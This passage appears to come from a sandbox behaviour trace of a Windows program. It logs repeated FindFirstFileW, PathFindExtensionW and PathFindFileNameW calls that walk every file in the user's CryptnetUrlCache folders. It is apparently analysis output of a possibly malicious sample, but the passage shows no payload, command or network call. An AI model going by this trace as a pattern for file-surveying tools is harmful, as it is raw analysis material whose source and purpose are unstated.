HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0134.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0134.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0134.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0134.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0134.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0134.911] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0134.911] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f8358 [0134.911] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f84c8 [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.911] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0cc8 [0134.911] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.911] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.911] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.911] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b888 [0134.911] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.911] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.911] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.911] PathFindFileNameW (pszPath="") returned="" [0134.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f84c8 [0134.912] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0134.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0134.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0134.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 